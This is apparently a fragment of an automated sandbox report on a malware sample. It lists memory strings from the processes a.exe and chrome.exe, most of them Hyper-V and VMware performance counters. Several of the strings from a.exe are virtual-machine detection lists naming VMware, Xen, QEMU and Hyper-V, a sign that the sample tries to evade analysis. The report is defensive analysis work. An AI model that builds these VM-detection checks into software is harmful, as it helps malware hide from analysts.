                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service,+
                      Source: chrome.exe, 0000000C.00000002.1510374519.0000021F24EAC000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1472885600.0000021F24EAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
                      Source: chrome.exe, 0000000C.00000002.1527875839.00003D3C01214000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=e85043da-2b6e-44fe-813c-c7ea66951e86
                      Source: chrome.exe, 0000000C.00000002.1502444360.0000021F22401000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V cdplirjdmpdrttm Bus
                      Source: chrome.exe, 0000000C.00000003.1419243436.0000021F40DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA w
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vm ware8394
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid PartitionH$
                      Source: chrome.exe, 0000000C.00000003.1472668469.0000021F40E5E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1472235393.0000021F40E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `BL{8082C5E6-4C27-48ec-A809-B8E1122E8F97}.contact shell extension handlerew Handlerst Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
                      Source: chrome.exe, 0000000C.00000003.1413822397.0000021F40DD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ess Packets: RS-Secondary3244In - Teredo Server Error Packets: Total3246In - Teredo Server Error Packets: Header Error3248In - Teredo Server Error Packets: Source Error3250In - Teredo Server Error Packets: Destination Error3252In - Teredo Server Error Packets: Authentication Error3254Out - Teredo Server: RA-Primary3256Out - Teredo Server: RA-Secondary 3258In - Teredo Server Total Packets: Success + Error / sec3206Teredo Client3208In - Teredo Router Advertisement3210In - Teredo Bubble3212In - Teredo Data3214In - Teredo Invalid3216Out - Teredo Router Solicitation3218Out - Teredo Bubble3220Out - Teredo Data3222In - Teredo Data User Mode3224In - Teredo Data Kernel Mode3226Out - Teredo Data User Mode3228Out - Teredo Data Kernel Mode6468Hyper-V Dynamic Memory Integration Service6470Maximum Memory, Mbytes1848Bluetooth Radio1850Classic ACL bytes written/sec1852LE ACL bytes written/sec1854SCO bytes written/sec1856Classic ACL bytes read/sec1858LE ACL bytes read/sec1860SCO bytes read/sec1862Classic ACL Connections1864LE ACL Connections1866SCO Connections1868Sideband SCO Connections1870ACL flush events/sec1872LE ACL write credits1874Classic ACL write credits1876LE Scan Duty Cycle (%) - Uncoded 1M Phy1878LE Scan Window - Uncoded 1M Phy1880LE Scan Interval - Uncoded 1M Phy1882Page Scan Duty Cycle (%)1884Page Scan Window1886Page Scan Interval1888Inquiry Scan Duty Cycle (%)1890Inquiry Scan Window1892Inquiry Scan Interval1894LE Scan Duty Cycle (%) - Coded Phy1896LE Scan Window - Coded Phy1898LE Scan Interval - Coded Phy1900Bluetooth Device1902Classic ACL bytes written/sec1904LE ACL bytes written/sec1906SCO bytes written/sec1908Classic ACL bytes read/sec1910LE ACL bytes read/sec1912SCO bytes read/sec3814ServiceModelService 4.0.0.03816Calls^^!
                      Source: a.exe, 0000000B.00000002.1787672422.00000000031E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|Xen4win32_process.handle='{0}'
                      Source: chrome.exe, 0000000C.00000002.1514580834.0000021F40DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTbeVMWare
                      Source: chrome.exe, 0000000C.00000003.1419806386.0000021F40E62000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1419108757.0000021F40E38000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1412845996.0000021F40E52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Mon
                      Source: a.exe, 0000000B.00000002.1787672422.00000000031E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 12 player*|vmpl5459
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|vm4595
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|*|vmware6886
                      Source: a.exe, 0000000B.00000002.1787672422.00000000033FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: rKD:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vmare7220
                      Source: chrome.exe, 0000000C.00000003.1413046805.0000021F40DEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Se
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor2:W
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1345858896.0000000005A1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\)@
                      Source: chrome.exe, 0000000C.00000002.1502444360.0000021F22330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionll
                      Source: a.exe, 0000000B.00000002.1787672422.00000000033FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: rSD:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 15 player*|vmplayer6438
                      Source: chrome.exe, 0000000C.00000002.1527875839.00003D3C01214000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
                      Source: chrome.exe, 0000000C.00000002.1502444360.0000021F223CE000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition~
                      Source: chrome.exe, 0000000C.00000003.1472885600.0000021F24DA4000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1510374519.0000021F24DA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processores
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Services
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|*|qemu10642
                      Source: chrome.exe, 0000000C.00000002.1502444360.0000021F2239B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
                      Source: a.exe, 0000000B.00000002.1787672422.00000000033FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: r2microsoft-hyper-v-client-migration-replacement.man
                      Source: chrome.exe, 0000000C.00000003.1421070490.0000021F40E47000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1419108757.0000021F40E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4
                      Source: chrome.exe, 0000000C.00000003.1421070490.0000021F40E47000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1419108757.0000021F40E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device p
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service>++
                      Source: chrome.exe, 0000000C.00000003.1472668469.0000021F40E5E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1472235393.0000021F40E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `XL{b9815375-5d7f-4ce2-9245-c9d4da436930}Microsoft Windows Mail Html Preview Handleriate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processh
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipesac
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyperv4178
                      Source: chrome.exe, 0000000C.00000002.1502444360.0000021F2239B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical ProcessorOu
                      Source: chrome.exe, 0000000C.00000002.1510374519.0000021F24E96000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1472885600.0000021F24E96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
                      Source: chrome.exe, 0000000C.00000002.1514580834.0000021F40DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\USER\S-1-5-21-2246122658-3693405117-2476756634-1002_Classes\CLSID\{7EFA68C6-086B-43e1-A2D2-55A113531240}\InProcServer32artupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA w
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipesui5
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|virtual5441
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1345858896.0000000005A70000.00000004.00000020.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1784934154.0000000001302000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: chrome.exe, 0000000C.00000002.1514580834.0000021F40DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\USER\S-1-5-21-2246122658-3693405117-2476756634-1002_Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Tim
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipess
                      Source: chrome.exe, 0000000C.00000003.1418642652.0000021F40E29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot the
                      Source: chrome.exe, 0000000C.00000003.1412915107.0000021F40E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervis
                      Source: chrome.exe, 0000000C.00000002.1510374519.0000021F24D32000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1472885600.0000021F24D36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V cdplirjdmpdrttm Bus Pipesy
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vspe6388
                      Source: chrome.exe, 0000000C.00000003.1419243436.0000021F40DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sted TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Tim
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vdi3894
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyper v4919
                      Source: chrome.exe, 0000000C.00000003.1472668469.0000021F40E5E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1472235393.0000021F40E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: L{09A47860-11B0-4DA5-AFA5-26D86198A780}EPPosoft Windows Mail Html Preview Handlerndows Desktop SearchB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4
                      Source: chrome.exe, 0000000C.00000003.1413822397.0000021F40DD5000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1413518447.0000021F40DB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|view5503
                      Source: chrome.exe, 0000000C.00000003.1419625359.0000021F40E2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot theHHf p
                      Source: chrome.exe, 0000000C.00000003.1419625359.0000021F40E2A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1412962829.0000021F40E1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Inte
                      Source: chrome.exe, 0000000C.00000003.1419243436.0000021F40DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total P
                      Source: chrome.exe, 0000000C.00000002.1502444360.0000021F223CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorc.sys
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partition.dll
                      Source: a.exe, 0000000B.00000002.1787672422.00000000033FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: r+microsoft-hyper-v-migration-replacement.man
                      Source: chrome.exe, 0000000C.00000003.1472668469.0000021F40E5E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1472235393.0000021F40E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `2L{289AF617-1CC3-42A6-926C-E6A863F0E3BA}DLNA Namespace Extensionbnail Handler800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device p
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vcenter5038
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partitiondll3.
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information queried: ProcessInformationJump to behavior
